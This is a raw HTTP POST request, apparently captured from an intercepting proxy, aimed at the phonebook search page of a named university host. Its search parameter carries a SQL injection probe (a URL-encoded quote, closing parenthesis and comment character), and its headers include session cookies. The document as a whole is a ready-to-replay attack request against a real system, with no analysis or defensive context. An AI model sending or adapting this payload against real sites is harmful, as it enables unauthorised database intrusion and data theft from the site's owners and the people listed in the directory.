POST /phonebook/search/index.php HTTP/1.1
Host: ga-ephone.nctu.edu.tw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://ga-ephone.nctu.edu.tw/phonebook/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
DNT: 1
Connection: close
Cookie: PHPSESSID=qu7ug31mos32ur4d81epg8vmu4; citrix_ns_id=2KetUb3Nt3GqeSJiXsvaTvexGRY0003
Upgrade-Insecure-Requests: 1

sKeyword=%27%29%23&x=14&y=3